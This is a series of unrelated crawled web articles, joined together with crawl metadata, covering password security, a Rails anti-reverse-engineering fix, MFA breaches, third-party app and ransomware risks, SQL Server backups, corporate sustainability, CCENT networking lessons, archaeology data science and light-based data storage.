the other hand, it’s anxiety-inducing and unsafe to use the same password for different accounts. This April, the CyberNews investigation team analyzed over 15 billion passwords leaked from multiple data breaches. The research shows that most common passwords are laughably easy to crack, with all-time hits like ‘123456’ topping the list. There are much better ways to create a strong password. For example, making up a unique phrase and applying various symbols for a more substantial effect. The best way, however, would be using a password manager, a tool that helps to create strong passwords you don’t even have to remember. Take a look at our team’s list for the best free password managers if you’re interested. More from CyberNews: Subscribe to our newsletter
<urn:uuid:96f5b1db-b0e3-4991-965a-34c70ba3db82>
CC-MAIN-2024-38
https://cybernews.com/news/digital-downsides-5-ways-technology-makes-our-lives-harder/
2024-09-14T20:42:54Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.74/warc/CC-MAIN-20240914193334-20240914223334-00876.warc.gz
en
0.936217
1,033
3.234375
3
Implementation of robust anti-reverse engineering protections This code is a simple login function in a Ruby on Rails application. The function takes in parameters for from the user input. When the user submits the login form, the function is called. It looks up the user by the submitted name using . If a user with the submitted name is found and the submitted password is correct (checked by ), the user's id is stored in the session ( session[:user_id] = user.id ) and the user is redirected to the root URL with a success message. However, this code is vulnerable to reverse engineering because it does not implement any anti-reverse engineering protections. A sophisticated attacker could use reverse engineering tools and techniques to understand the login process, bypass the login function, or even extract sensitive data like user credentials. For instance, the password authentication is done directly in the controller, and the password is sent in plaintext from the client to the server. This could be intercepted and reverse engineered. Moreover, sensitive operations like user authentication should not be implemented directly in the controller. They should be encapsulated in service objects or model methods, which would make it harder for an attacker to reverse engineer the authentication process. Lastly, the code does not implement any form of rate limiting or account lockout after a certain number of failed login attempts. This makes it easier for an attacker to perform a brute force attack by trying many different passwords until they find the correct one. The updated code includes the use of the 'ruby-obfuscator' gem, which is a tool that obfuscates Ruby code to make it harder to reverse engineer. The obfuscation process transforms the code into an equivalent, but harder to understand version. This makes it more difficult for attackers to understand the code's logic and find vulnerabilities. The 'ruby-obfuscator' gem is used to obfuscate the UsersController code. The obfuscated code is then written back to the 'users_controller.rb' file. Please note that obfuscation is not a foolproof method of preventing reverse engineering. It is just one layer of security that can be used in conjunction with other methods such as code encryption, tamper detection, code signing, regular updates and patches, security assessments, penetration testing, and developer education. Also, remember to add 'ruby-obfuscator' to your Gemfile and run to ensure the gem is installed in your application.
<urn:uuid:0ee0ba41-bc16-45aa-b22c-6b325e4c88e9>
CC-MAIN-2024-38
https://help.fluidattacks.com/portal/en/kb/articles/criteria-fixes-ruby-376
2024-09-14T21:59:38Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.74/warc/CC-MAIN-20240914193334-20240914223334-00876.warc.gz
en
0.904489
505
3.359375
3
Explore the intricate world of managed modern health IT, surpassing [...] Duo Multi-Factor Authentication Breached What Really Happened? MFA is a security measure that is supposed to protect people from hackers. However, Russian hackers are now exploiting MFA to hack people and steal their information. The use of MFA is becoming more and more popular because it’s a way to protect your personal information from being hacked. However, Russian hackers are now exploiting MFA for the opposite reason – hacking other people’s accounts. Duo is one of the leading multi-factor authentication services that provides two-factor authentication for online accounts, and it is used by many organizations to protect their data and accounts from hackers. Duo was recently breached when an organization failed to remove an old employee who had access to the company’s account. This allowed the hacker to completely bypass the MFA set on the account. This was not a vulnerability with the MFA provider, but one inactive account allowed Russian hackers to use that account to access the company’s data. The breach was discovered when Duo noticed unusual activity on their servers and investigated it further. A breach on an MFA provider like Duo is a good example of why user account hygiene is so important, and why security patches need to go in as soon as they are practical. Multi-Factor Authentication Does Not Protect You From Everything Multi-factor authentication provides stronger security than single-factor authentication, but it doesn’t protect you from everything. - MFA does not protect against malicious insiders. In the case of a malicious insider, they can use stolen credentials to access data on your network. - MFA is not always mandatory. Some organizations are not required to use multi-factor authentication by law or policy. - MFA is not always effective. If your computer has been infected with malware, then the user will still have access even if they are using 2FA. - MFA can be circumvented with physical access. With physical access, an attacker can bypass 2FA and gain unauthorized access to your network without any help from technology. - MFA is only as strong as its weakest link. The weakest link in multi-factor authentication is the human factor. If an attacker gets close enough to a user, they can steal their access credentials and use them to access your environment. - MFA has its own risks. Inherent weaknesses in multi-factor authentication systems can be exploited by an attacker. - MFA could be bypassed by attackers. An attacker with physical access could install a device that captures data from the user’s computer(given there is no biometric identification)to then use this data to impersonate the user and access protected services. What are the Risks of Leaving Inactive Employee Accounts on Your Network? In recent years, there has been a rise in the number of data breaches and data leaks. The most common reasons for these breaches are former employee accounts with access to the company’s information. A former employee account is a gold mine for hackers and cybercriminals. They can easily access personal information like emails and passwords that have been used by former employees. It also leaves an open door for data theft if the company does not take precautions to remove it. It is important to remove inactive employee accounts because they are a security risk. If an account has been inactive for more than 90 days, it can be hacked by malicious users who can use that account to access other companies’ data. With the number of employees on the rise, it is increasingly difficult for companies to keep track of all their employees and their personal information. How Can Companies Remove Inactive Employee Accounts? There are many ways companies can remove former employee accounts to avoid a data breach. One way is to have an automated system that removes inactive accounts automatically after a certain period of time. Another way is to have a human-based system where employees manually remove all the inactive accounts. Companies should consider these methods before they decide on how they want their former employee accounts removed. Some companies have seen a severe impact in terms of fund loss, personal data misuse, and security breaches when their personal data is compromised. We will provide 5 reasons to remove inactive employee accounts in order to prevent data breaches. The 5 reasons why it is important to remove inactive employee accounts are: - Data breaches - MFA hack - Security risk - Employee retention and productivity - Employee satisfaction Companies should keep in mind that they are responsible for any damage caused by a data breach and should take measures to prevent it. Companies should establish a data breach response plan that includes how to report a breach, what information is to be disclosed and how it will be protected. This plan should also include an emergency response team that can be reached at all times when there is a data breach. Multi-Factor Authentication (MFA) is an important security technique that helps to protect your account from unauthorized access, but it is not a perfect solution. If you would like more information on how to secure your network and protect your business and livelihood from hackers, give us a call at (719) 439-0599. Latest Blog Posts Discover why rural hospitals need more than just IT support. Learn how [...] Discover how rural hospitals can access world-class IT support without [...]
<urn:uuid:747facac-1f66-40ad-85be-2d7fd966ea44>
CC-MAIN-2024-38
https://www.coloradosupport.com/duo-multi-factor-authentication-breached/
2024-09-14T20:46:18Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.74/warc/CC-MAIN-20240914193334-20240914223334-00876.warc.gz
en
0.957887
1,094
2.65625
3
It is easy to overlook the risks of third-party apps. You see a cool app and install it on your phone. You see the prompt asking you for permissions. It is not clear what the app wants to access or why, but you want the app. You click “Grant” or “Allow” and away you go. Some third party now has access to your contacts, you schedule, and maybe even your files. Whether mobile apps, browser extensions, or freemium apps, your user community is installing apps and tools and granting access to your data. And while most apps are harmless and well-behaved, one rogue app can be a disaster. The Hidden Dangers of Third-Party Apps Not every app, and not every app provider, is trustworthy. And since most apps need access to some of your data in order to function, permissions should not be granted without some forethought. Preventing individual users from installing apps and granting permissions, however, is nearly impossible. Most small and midsize organizations have neither the money or resources to micromanage browsers and mobile devices — especially in our BYOD world. Using third-party apps can come with certain risks, and it’s important to be aware of them before installing and using such applications. Here are some common risks associated with third-party apps: - Security and Malware: Third-party apps may pose security risks as they are not subject to the same level of scrutiny and oversight as apps available on official app stores. Some third-party apps may contain malware, spyware, or other malicious code that can compromise your device’s security and steal personal information. - Data Privacy: Third-party apps may collect and misuse your personal data without your knowledge or consent. These apps may access sensitive information stored on your device, track your online activities, or share your data with third parties for targeted advertising or other purposes. This makes a good case for implementing proper data protection and security measures. - Compatibility and Reliability: Third-party apps may not be as reliable or compatible with your device as apps provided by trusted sources. They may crash frequently, have compatibility issues with your operating system or other apps, or cause other technical problems. - Lack of Updates and Support: Third-party apps may not receive regular updates or support from developers. This can lead to compatibility issues with new operating system versions or security vulnerabilities that go unpatched, leaving your device exposed to potential threats due to outdated technology. - Inadequate User Reviews and Ratings: Unlike official app stores that have stricter review processes, third-party app sources often lack reliable user reviews and ratings. This makes it challenging to assess the quality, safety, and overall user experience of these apps. - Legal and Copyright Issues: Some third-party apps may infringe upon intellectual property rights, such as copyrighted content or trademarks. Installing and using such apps could potentially lead to legal repercussions. To minimize the risks associated with third-party apps, consider the following precautions The Best Ways to Safeguard Your Device and Data from Third-Party Risks Fortunately, for those of us running Google Apps and other cloud services, we have affordable solutions for monitoring and managing third party app access to your data. Our Recommendation to Shield Your Device from Potential Harm If you are running Google Apps, we generally recommend BetterCloud Enterprise as our preferred solution for several reasons: - The Domain Health and Insight Center provides you with activity reports, alerts, and advanced reporting - Bettercloud includes a robust suite of Google Apps admin tools that are not available in the Google Apps Admin Console, including bulk actions, dynamic groups, and a user deprovisioning wizard - BetterCloud monitors and lets you manage third party app access to any data within Google Apps, and provides a trust rating to help you determine which applications pose a risk - BetterCloud monitors activity in Drive against business rules to ensure compliance with data privacy policies and regulations. BetterCloud will proactively modify permissions and send alerts to prevent accidental or intentional violations. Additional Ways to Guard Against the Pitfalls of Third-Party Apps - Only download apps from trusted sources, such as official app stores or reputable websites. - Read reviews and ratings from other users before installing an app. - Check the permissions requested by the app and ensure they are necessary for its functionality. - Keep your device’s operating system and security software up to date. - Use reputable antivirus software to scan apps before installation. - Be cautious when granting excessive permissions or sharing sensitive information with apps. - Regularly review and remove any unused or suspicious apps from your device. How Cumulus Can Help Protect You From Third-Party App Risks While there is a minimum fee for BetterCloud Enterprise, you can try BetterCloud for free for up to 30 days. If you like what you see, we will waive the setup fees. If not, you can keep running the Domain Health and Insight Center for free.
<urn:uuid:04f73fa3-8d53-4f5b-9020-60ea5f2d68d8>
CC-MAIN-2024-38
https://www.cumulusglobal.com/tag/domain-health-insight-center/
2024-09-07T18:26:09Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650898.24/warc/CC-MAIN-20240907162417-20240907192417-00676.warc.gz
en
0.927214
1,026
2.53125
3
All these days there was a myth among web users that changing passwords on a regular note will help in isolating them from cyber attacks. But Paul Edmonds, head of technology at UK National Cyber Crime Unit claims that this is a fallacy spread by security experts. The cyber chief added that passwords changed on a regular note make users less secure and more prone to cyber attacks. Speaking his mind at a Security and Counter Terror Conference in London, Paul added that password change doesn’t make the users less prone to attacks and vice versa. Quoting an example of the security policy adopted by PayPal, MR. Edmonds said that the financial gateway doesn’t ask its customers to change the password for years. The reason, if it did, then it would have lost money. Experts believe that by changing passwords on a regular note, users tend to adopt for weaker passwords and this gradually exposes them to hackers. Speaking at the conference on the ongoing online terror spread by Islamic Groups, Rob Wainwright, the head of European Union Policy Agency concurred with the opinion of Mr. Edmunds on changing passwords on a regular note. And added that he still uses a 2-year old password to fetch his banking account and added that 2-way authentication helps in isolating him from all troubles. At the conference, Rob also discussed a bit on the terrorist groups using online platforms for their illegal activities. He said that terror organizations are now busy in developing their own social media platforms to avoid security crackdowns on their communication mediums. Rob added that a similar website which was being used by terror agencies was cracked down last week and this paid way to know the fact. Mr. Wainwright said that apps like Telegram, in particular, had been creating problems for Europol, and accused the firm of being evasive on its work objective. He said that most companies like Facebook, Google and Whatsapp were coming forward to help the security agencies in counter-terror operations. But at the same time, some firms like Telegram which use high encryption were non-cooperating in the mission of securing the populace of UK from terror attacks. So, he felt that a technical crackdown on them is needed in near future. Rob Wainwright, added that the much-needed security cooperation between EU and Britain will continue as now, even after Brexit. So, do you believe the same that changing passwords on a regular note will not work in cyberspace anymore? If not, please share your mind through the comments section below.
<urn:uuid:2a3c80e3-dbaf-42ad-aa9e-73680d4b464c>
CC-MAIN-2024-38
https://www.cybersecurity-insiders.com/password-change-doesnt-save-you-from-cyber-attacks/
2024-09-08T22:09:13Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651035.2/warc/CC-MAIN-20240908213138-20240909003138-00576.warc.gz
en
0.969363
517
2.65625
3
Last week I wrote about how easy it is to protect a SQL environment with Cohesity. This week we continue the conversation. Organizations that use Microsoft SQL Server sometimes struggle with how best to protect their SQL databases against accidental data loss. As is the case for other database platforms, there are a wide variety of tools and techniques available for protecting SQL Server, ranging from native built-in tools to third party commercial backup applications. In addition to there being a diverse collection of tools available for SQL Server backups, there are a variety of backup techniques that can be applied. Two of the more common techniques for example, are copy and dump. Dump can be thought of as either a tool or a technique. As a technique, dump refers to dumping SQL Server data to backup. As a tool, Dump refers to a command that is supported natively by Microsoft SQL Server. Although the Dump command still exists in SQL Server today, it is actually a legacy tool that exists solely for backward compatibility purposes. Originally, the Dump statement provided a way for administrators to backup SQL Server databases and transaction logs. An administrator could back up a database by using the DUMP DATABASE command. Similarly, transaction logs could be backed up by using the DUMP TRANSACTION command. The BACKUP command has largely replaced the DUMP command. SQL Server databases and log files can be backed up by using the BACKUP DATABASE and BACKUP LOG commands respectively. Whether an administrator uses the DUMP command or the BACKUP command, dump backups are very flexible. An administrator can use these commands to perform full, incremental, or differential backups. There are also a variety of management and monitoring capabilities that are supported by the command. Copy backups, which are sometimes referred to as copy only backups, are a variation on dump backups. In fact, a copy only backup uses the BACKUP command just like a DUMP backup does, but appends the COPY_ONLY argument. Copy only backups were first introduced in SQL Server 2005, and serve as a mechanism for creating a one-off backup that does not interfere with the normal backup sequence (from a transaction log file processing standpoint). Copy only backups are sometimes taken in an effort to preserve log files prior to attempting a restore operation, but they can be used for other purposes such as making a backup that can later be used as the basis for a test / dev environment. As previously noted, dump and copy only backups are both based on the BACKUP command. The BACKUP command has existed in SQL Server long enough for it to be considered stable and reliable. Even so, the BACKUP command is just that – a command. It provides a way of initiating backup operations from the command line. The main issue with using the BACKUP command is its sheer complexity. As you can see in the command’s documentation, the BACKUP command allows for a massive number of arguments and parameters. Admittedly, SQL Server administrators are used to dealing with complexity. When it comes to backup and restoration operations however, complexity is generally regarded as a bad thing. An overly complex backup solution carries with it a high potential for human error. Such errors can leave SQL Servers unprotected, while giving administrators the illusion that their backups are working properly. Although SQL Server has a reputation for being complex, data protection for SQL Server can actually be quite simple. Cohesity has created a backup platform for SQL Server that is surprisingly easy to use. To get started, backup administrators must register their SQL Servers, which involves little more than specifying the servers that need to be protected, and supplying administrative credentials. Once the organization’s SQL Servers have been registered, the administrator needs only to create a protection job. Although the creation of SQL Server protection jobs is often a complex undertaking, Cohesity has pared the process down to four simple steps. Those steps consist of: - Selecting the objects to be protected. - Selecting a data protection policy. - Specifying the job settings. - Confirming the information presented on the summary screen. Better still, Cohesity uses the same basic approach to creating a protection job, regardless of the type of resource that is being protected. As such, an administrator who knows how to use the Cohesity platform to backup resources such as VMware or Hyper-V already knows how to back up SQL Server. In my third and final post in this three-part series, I will discuss using Cohesity for more efficient Test / Dev. All blogs in this series: - How Easy is it to Protect a SQL Environment with Cohesity? - Protecting SQL Catabases: Cohesity as an Alternative to Dumps and Copies
<urn:uuid:10212aec-ec1f-4bd3-9562-5b89dff02799>
CC-MAIN-2024-38
https://www.cohesity.com/blogs/protecting-sql-databases-cohesity/
2024-09-11T08:57:33Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651383.5/warc/CC-MAIN-20240911084051-20240911114051-00376.warc.gz
en
0.934193
974
3.046875
3
It is undeniable that the world today is facing numerous environmental issues such as global warming and climate change. As we continue to see the negative impacts of these issues, an increasing number of governments, organizations, and individuals are embracing and promoting environmental sustainability. Environmental sustainability is the ability to maintain an ecological balance in the planet’s natural environment and conserve natural resources to support the wellbeing of current and future generations, and it has become a global imperative in the face of escalating ecological challenges. One of the best ways to practice environmental sustainability is to prevent waste, whether it be finding new efficiencies, doing things smarter, or valuing every resource. According to the world bank statistics, the world generates 2.01 billion tons of municipal solid waste annually, with at least 33 percent of that not managed in an environmentally safe manner. Understanding how waste is produced and how it can be minimized, or even prevented, is the first step to reduce waste and protect our environment; in that way, pollution prevention is an essential component of sustainability. Another major contributor to environmental issues is Greenhouse Gas (GHG) emissions, with the majority of the gasses being specifically made up of Carbon Dioxide (CO2). GHG from human activities have increased over the years; they build up in the atmosphere and warm the climate, leading to many other changes around the world, in the atmosphere, on land, and in the oceans. According to International Energy Agency (IEA), global energy-related CO2 emissions grew by 0.9% or 321 metric tons in 2022. With the rise of global waste and carbon emissions, industries and businesses are changing their behaviors and investing in sustainability. Moreover, with the escalating environmental challenges, the concept of a circular economy has also emerged as a promising solution and has become a fundamental aspect of many business operations. In this article, I would like to highlight Beyon’s efforts towards environmental sustainability and share its journey in 4 main areas which are: managing energy usage, clean energy production, supply chain management and waste management. Beyon has set sustainable objectives and commitments that are in line with national and international sustainable development goals and is on a mission to achieve them. One part of Beyon’s sustainability objectives involves using renewable energy. Beyon has started its journey with renewable energy sources in 2021 when the first phase of the Company’s solar park was established, and then expanded with phase 2 in 2023. Beyon’s Solar Park Phase 1 and 2 is generating 3.6 GWh of clean energy leading to a carbon footprint saving of over 2000 tons annually. Moreover, Beyon’s Data Centre is the first in Bahrain to rely entirely on clean energy generated from the company’s Solar Park, which is located at Beyon Data Oasis. Beyon is continuously exploring opportunities for renewable energy wherever possible. The company aims to power its business and network with renewables and is committed to powering it in the most sustainable way, while also making its network more efficient. For instance, the sunsetting of Batelco’s 2G network not only made way for transformation towards advanced mobile development but led to a reduction in electricity consumption as well as a reduction in CO2 emissions by an estimated 827 metric tons annually, which according to environmental studies is equivalent to the effect that approximately 30,000 trees would have on the environment. Another part of Beyon’s sustainability objectives is providing solutions that are environmentally friendly; these solutions include products such as Cloud based services, and Information and communications technology. A very popular product of Beyon’s portfolio is OneBox, which is a digital postbox solution delivered by Beyon Connect that enables communication services between the public and private sectors and individuals in one secure, convenient, and sustainable digital platform. A key benefit of OneBox is that it reduces the need to transport and physically deliver millions of mailed letters and documents, which supports a reduction of carbon footprint per capita. As mentioned previously, waste is a major contributor to the world’s pollution, and from the 2 billion tons of solid waste, around 40 million tons of electronic waste is generated every year, worldwide. That’s like throwing away 800 laptops every second. Waste prevention is a critical component to sustainability, therefore, as a tech company Beyon is adopting a circular economy approach, which is a method that encourages reuse, repair and recycle. It’s a conscious way of consuming resources and materials in a circular rather than a linear system, to reduce waste and prolong the life of materials. Beyon already started taking steps in adopting this approach, and one example of Beyon’s circular economy practice is its collaboration with a partner to repurpose its assets such as old tech devices, equipment, and cables. With such collaborations Beyon is trying to move away from a culture that uses and throws away to a culture of reuse, extending the life cycle of its products and making use of them rather than have them discarded as e-waste in landfills. Moreover, Beyon prefers to deal with suppliers that are environmentally conscious even in the smallest details of its operations. For instance, during corporate events, Beyon makes sure that the materials used for the events are reusable or recyclable or biodegradable in order to reduce the amount of waste generated from events. In conclusion, reducing environmental footprint is a challenge, but by focusing on areas of biggest impact and committing to actions across businesses, I believe we can create transformational change. Moreover, adopting a circular economy approach and capitalizing on its impact will also support the vision in reducing emissions and waste across businesses. Environmental sustainability and the conservation of natural resources are important, and it is our responsibility to act now and make conscious choices that prioritize the long-term wellbeing of our environment. No matter how small or big the steps we take, whether its organizations or individuals, through collective efforts, we can build a sustainable and resilient world for ourselves and future generations. An article by Maryam Al Ghatam – Public Relations Specialist, Beyon Corporate Comms. and Sustainability Department.
<urn:uuid:ae2a1842-bdea-4ba3-b778-574b8824b89b>
CC-MAIN-2024-38
https://beyon.com/2023/08/22/beyon-cares-beyond-now-beyons-efforts-towards-environmental-sustainability/
2024-09-13T21:33:56Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.48/warc/CC-MAIN-20240913201909-20240913231909-00176.warc.gz
en
0.953023
1,229
3.4375
3
As we venture into today’s Cisco CCENT and CCNA exam scenario based question we will be covering the topic of collision and broadcast domains. It will be very common for you to see on the CCNA or CCENT exam questions in which you need to identify the number of collision and broadcast domains based upon a topology diagram. So the first thing you need to be able to do it so understand how to read a basic network topology as you will see a multitude of these topology diagrams on the exam. Now one of the things Cisco tries to do on the CCENT and CCNA exam is to confuse you with similar terminology such as the terms collision domain and broadcast domain. So you need to make sure you understand the difference between the two and can pick out each in the topology diagram. So let’s take a look at it. CCENT & CCNA Exam Topology Question Now that you had a chance to review the diagram, let’s take a look at the associated question. One thing you will want to note though for those of you try to brain dump, Cisco is on to that and what they are doing is slightly varying the topology diagram while giving the same set of answers. So that is why you really need to understand the material and not do brain dumps (also if you do brain dump and get a job, you will be found out really quickly and looking for work again). Which of the following statements describe the network shown in the graphic? (Choose two) A. There are two broadcast domains in the network. B. There are six broadcast domains in the network. C. There are four broadcast domains in the network. D. There are five collision domains in the network. E. There are seven collision domains in the network. F. There are four collision domains in the network. So what we are going to do is start off with some of the theory behind this sort of question before we provide you the answer. A collision domain is an area where frames that have collided are propagated and it usually happens when there is a hub or a repeater, a collision domain is usually broken up by a layer 2 device such as a switch or a layer 3 device such as routers. A broadcast domain is an area where all devices receive broadcast frames such as a switched network that doesn’t have VLANs. Routers usually break up broadcast domains. In this scenario, there are 2 broadcast domains, one on the right side where there is a hub, and the other on the left side where there is a switch. The router breaks up the broadcast domain. Further, there are 5 collision domains 1 on the right since it is a hub and on the left each connection to the switch is a collision domain and it is broken up by the router. So that leave us with the correct answers of A and D. Learning theory is great, but what really hammers home how this works is by replicating this scenario in your CCENT and CCNA home lab. As you can see from the topology diagram you can do this very easily. The device in the top center that is round with two arrows pointing in and two arrows pointing out is a router. The device on the left with the four arrows pointing out is a switch and the device on the right with the single line and two arrows pointing out is a hub. These are networking industry standard diagrams which you will need to know for the exam. The router you will need to have will have to have two Ethernet ports on it. If you are unsure of which Cisco routers have two Ethernet ports on it you can find a pretty good overview of them on our CCENT & CCNA Lab Suggestions page . You can then use any Cisco switch and any brand hub. By recreating this lab topology, you will be able to use a program like WireShark which we include in our kits and see how the traffic moves on the network and where the routers break up the broadcast domains. So while learning the theory behind the question is definately valuable, seeing it work with real hands on experience is the thing that makes it sink in for most so they don’t forget the concept. If you are interested some of our lab kits, you can see them below.
<urn:uuid:d4510a5c-2bea-40b3-a545-e9930d1328b7>
CC-MAIN-2024-38
https://www.certificationkits.com/ccent-ccna-exam-question-collision-broadcast-domains/
2024-09-13T22:39:42Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.48/warc/CC-MAIN-20240913201909-20240913231909-00176.warc.gz
en
0.960215
880
3.265625
3
Cisco CCENT Device Function and Packet Delivery Now we will discuss device functions and packet delivery process for OSI layers 1 through 3. Cisco CCENT Layer 1 Device Function The physical layer defines the electrical, mechanical, procedural and functional specifications for: the physical link between end systems. Some common examples are Ethernet segments and Serial links. The Physical layer sends Bits between peer physical layers. Cisco CCENT Layer 2 Device Function and Address The Data Link layer (also called Layer 2) provides the physical transmission of the data and handles error notification, network topology, and flow control. Addresses at the Data Link Layer (Layer 2) in a LAN environment are referred to as MAC addresses. Each device has a unique MAC address assigned by the vendor. The Data Link layer sends Frames between peer data link layers. Cisco CCENT Layer 2 Packet Delivery Delivering an IP packet within a single LAN segment is pretty simple. If host A wants to send a packet to host B it first must have an IP address to MAC address mapping for host B since at Layer 2 packets are sent with MAC addresses as the source and destination addresses. If a mapping does not exist, host A will send an ARP Request (broadcast on the LAN segment) requesting the MAC address for IP address 192.168.1.1. Host B will receive the request and respond with an ARP reply indicating the MAC address is 0080.007A.580C. Now that host A knows the MAC address associated with 192.168.1.1 it can send an IP packet with a destination address of 192.168.2.2. The ethernet frame will have a source IP of 192.168.1.2, destination IP of 192.168.2.2, source MAC of 0023.5413.7F46 and destination MAC of 0023.5476.A26B. Cisco CCENT Layer 3 Address Network Layer (Layer 3) addresses are logical addresses assigned by a network administrator. The slide shows IPv4 addresses. Cisco CCENT Layer 3 Packet Delivery There are several steps involved in delivering an IP packet across a routed network. When a packet is not destined for the local network the hosts sends it to its default gateway which is the address of a directly connected router. For example if host A wants to send a packet to host B it will send the packet to its default gateway which is the address of the router. In order to send a packet to the router, host A will need to know the MAC address of the router. To find this, host A sends an ARP packet asking for the MAC address that is associated with IP address 192.168.1.1. This packet is broadcast on the local network. The router receives the ARP request and realizes it is for an IP address he has configured so he responds with an ARP Reply indicating the MAC address is 0080.007A.580C. Cisco CCENT Layer 3 Packet Delivery Now that host A knows the MAC address associated with 192.168.1.1 it can send an IP packet with a destination address of 192.168.2.2. The packet with have a source IP of 192.168.1.2, destination IP of 192.168.2.2, source MAC of 0023.5413.7F46 and destination MAC of 0080.007A.580C. When the router receives the packet it will end an ARP request for 192.168.2.2. Host B receives the ARP request and responds with an ARP reply indicating the MAC address associated with IP address 192.168.2.2 is 0023.5476.A26B. Now that the router knows the MAC address of 192.168.2.2 it can send the packet. The ethernet frame delivered to host B will have a source IP of 192.168.1.2, destination IP of 192.168.2.2, source MAC of 0080.00A3.4F73 and destination MAC of 0023.5476.A26B. Note: The packet delivered by the router ha the same source / destination IP but different source / destination MACs.
<urn:uuid:be2f9a94-0782-44b7-ac3a-400c775174a9>
CC-MAIN-2024-38
https://www.certificationkits.com/cisco-certification/ccent-640-822-icnd1-exam-study-guide/cisco-ccent-icnd1-640-822-exam-certification-guide/cisco-ccent-icnd1-packet-delivery/
2024-09-13T20:38:53Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.48/warc/CC-MAIN-20240913201909-20240913231909-00176.warc.gz
en
0.903437
886
3.21875
3
Cyber Security is an issue that almost every single modern business has to be worried about. After all, nearly every company, no matter the size, depends on a computer system in one form or another. Protecting your data against harmful cyber-criminals is vital for many different reasons. You might have sensitive information regarding customers, employees, products, business plans, financial records, and more that you cannot afford to have compromised. That is why you must know how to defend against one of the most common types of hacking software – ransomware. Ransomware – What is it? Ransomware is a malicious type of software that breaches computer systems, much like malware. Only cyber-criminals use ransomware to hack a device, then gaining access to whatever data they find. They then hold the data on the device hostage, unless they are paid a ransom. Here are the five most common kinds of ransomware. Cerber is a relatively newer ransomware that was developed back in 2017. However, what makes it so deadly is that the decryptor for each variant is compatible with 12 multiple languages. This made it much easier for the creator to create an affiliate system, essentially creating a ransomware-as-a-service platform that endued in huge profits for the creator separate from their independent cyber-attacks. Cerber usually targets cloud-based Office 365 users through an elaborate phishing campaign. Locky is a form of ransomware that’s spread through spam, often disguised as an email message that looks like an invoice. Once opened, the user is instructed to activate macros to read it. Once the user does this, the ransomware will start encrypting files, requesting a ransom to unlock them. Crylocker is ransomware that personalizes the ransom note by using data it locates on the user’s computer, such as the user’s name, location, birthday, system details, IP address, or Facebook account to pressure the user. From here, it locks the user out of their computer and requests payment within 24 hours. Jigsaw is a dangerous form of ransomware in that it will encrypt your files and start deleting them automatically until the ransom is paid in full. It deletes one or more files every hour throughout a 72-hour period. Once the 72 hours are over, all of the files that were encrypted will be removed. En-Net Services Can Help Today Experience a superior method of getting the public sector technology solutions you need through forming a partnership with En-Net Services. Our seasoned team members are familiar with the distinct purchasing and procurement cycles of state and local governments, as well as Federal, K-12 education, and higher education entities. En-Net is a certified Maryland Small Business Reserve with contract vehicles and sub-contracting partnerships to meet all contracting requirements. To find out more about our hardware services, printing, and imaging services, or to hear more about how a dynamic team can help meet your information technology needs, send us an email or give us a call at (301)-846-9901 today!
<urn:uuid:f15e3052-4d92-4981-afeb-83ed922f9afe>
CC-MAIN-2024-38
https://www.en-netservices.com/blog/the-4-most-common-kinds-of-ransomware/
2024-09-15T04:28:43Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651614.9/warc/CC-MAIN-20240915020916-20240915050916-00076.warc.gz
en
0.950954
622
2.828125
3
Democrata, a U.K. based Data-as-a-service provider is reducing the risk of builders stumbling upon archaeological sites or artefacts during construction by tapping into and analysing data collected by public sector information bodies. “It’s an expensive problem to have once you’ve started digging,” Geoff Roberts, CEO of Democrata, told New Scientist. “We wanted to bring data science in as an added tool, so humans involved in the process could use it to understand what would likely be found,” he said. Democrata use predictive algorithms to help locate and identify likely spots for buried artifacts before digging begins. Their algorithms are trained on data from a variety of sources, including the Forestry Commission, English Heritage and Land Registry, as well as ‘grey literature’, a huge wealth of unpublished records written by contractors every year. Democrata’s data-driven approach helps save companies time and cost of excavation. As New Scientist points out, archaeological services can amount to between 1 and 3 per cent of contractors’ total construction cost. However, Henry Chapman at the University of Birmingham, UK, raises concerns that approaches like Democtata’s may hinder new archaeological discoveries.”If you think about the number of archaeological fieldwork excavations that take place purely for trying to find out about the past, that’s a very small amount compared to all of the excavations done before commercial development,” he told New Scientist. Democrata showcased the program in front of engineering companies and government authorities for feedback, last week. Read the full New Scientist write-up here. (Image credit: Cristiano Oliveira)
<urn:uuid:83d08e9f-fbbd-4e06-b53b-500eb1d5ddc3>
CC-MAIN-2024-38
https://dataconomy.com/2015/02/02/how-archaeology-and-data-science-are-helping-builders-to-avoid-buried-treasure/
2024-09-16T06:28:49Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651676.3/warc/CC-MAIN-20240916044225-20240916074225-00876.warc.gz
en
0.95417
354
2.671875
3
Superfast data processing using light pulses instead of electricity has been created by scientists. The innovation uses magnets to record computer data which consume virtually zero energy, solving the dilemma of how to create faster data processing speeds without the accompanying high energy costs. Today’s data centre servers consume between two to five percent of global electricity consumption, producing heat which in turn requires more power to cool the servers. The problem is so acute that Microsoft has even submerged hundreds of its data centre services in the ocean in an effort to keep them cool and cut costs. Most data is encoded as binary information (0 or 1 respectively) through the orientation of tiny magnets, called spins, in magnetic hard-drives. The magnetic read/write head is used to set or retrieve information using electrical currents which dissipate huge amounts of energy. Now an international team publishing in Nature has solved the problem by replacing electricity with extremely short pulses of light – the duration of one trillionth of a second – concentrated by special antennas on top of a magnet. This new method is superfast but so energy efficient that the temperature of the magnet does not increase at all. The team includes Dr Rostislav Mikhaylovskiy, formerly at Radboud University and now Lancaster University, Stefan Schlauderer, Dr Christoph Lange and Professor Rupert Huber from Regensburg University, Professor Alexey Kimel from Radboud University and Professor Anatoly Zvezdin from the Russian Academy of Sciences. They demonstrated this new method by pulsing a magnet with ultrashort light bursts (the duration of a millionth of a millionth of a second) at frequencies in the far infrared, the so-called terahertz spectral range. However, even the strongest existing sources of the terahertz light did not provide strong enough pulses to switch the orientation of a magnet to date. The breakthrough was achieved by utilising the efficient interaction mechanism of coupling between spins and terahertz electric field, which was discovered by the same team. The scientists then developed 